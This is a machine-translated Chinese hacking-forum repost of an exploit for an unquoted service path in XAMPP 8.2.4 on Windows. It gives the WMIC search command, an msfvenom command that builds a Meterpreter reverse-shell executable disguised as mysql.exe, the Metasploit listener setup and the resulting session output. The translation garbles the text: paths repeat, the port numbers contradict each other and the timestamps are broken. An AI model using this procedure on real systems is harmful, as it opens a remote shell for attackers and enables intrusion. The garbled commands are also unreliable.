H

XAMPP 8.2.4-未引用的路径

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: xampp 8.2.4-未引用的路径
#日期: 07/2023
#利用作者: Andrey Stoykov
#版本: 8.2.4
#软件link: https://sourceforge.net/projects/xa...p-windows-x64-8.2.4-0-vs16-vs16-installer.exe
#在: Windows Server 2022上测试
#blog: http://mmsecureltd.blogspot.com/
利用:的步骤
1。搜索未引用的路径
2。生成米型壳
3。复制shell to xampp目录代替“ mysql.exe”
4。通过双击外壳来利用
C: \ USER \ ASTOYKOVWMIC服务获取名称,DisplayName,PathName,StartMode | Findstr /I'auto'| Findstr /I /V'C: \ Windows \ Windows \\'| Findstr /I /V''''''''''''
mysql mysql C: \ xampp \ mysql \ bin \ mysqld.exe -defaults-file=c: \ xampp \ mysql \ mysql \ bin \ bin \ my.ini mysql auto
//生成外壳
MSFVENOM -P Windows/MeterPreter/reverse_tcp lhost=192.168.1.16 lport=4444 -f exe -o mysql.exe
//设置侦听器
MSF6使用漏洞/多/处理程序
MSF6 Exploit(Multi/Handler)SET LHOST 192.168.1.13
MSF6 Exploit(Multi/Handler)SET LPORT 4443
MSF6 Exploit(Multi/Handler)设置有效载荷MeterPreter/reverse_tcp
MSF6 Exploit(Multi/Handler)运行
MSF6 Exploit(Multi/Handler)运行
[*]于192.168.1.1.13:443启动反向TCP处理程序
[*]将阶段(175686字节)发送至192.168.1.11
[*] MeterPreter会议1开放(192.168.1.1.1.1.13:4443-192.168.1.1.11:49686)在2023-07-07-08 033:5933:40-07-07-07-07-07-07-07-07-07
MeterPreter Getuid
服务器用户名: win-5pt4k404nlo \ astoykov
MeterPreter GetPid
当前PID: 4724
MeterPreter壳
过程5884创建。
频道1创建。
Microsoft Windows [版本10.0.20348.1]
(c)Microsoft Corporation。版权所有。
[.]
C: \ Xampp \ mysql \ bindir
dir
驱动器中的体积C没有标签。
音量序列号为80B5-B405
C: \ XAMPP \ mysql \ bin的目录
[.]
 
后退
顶部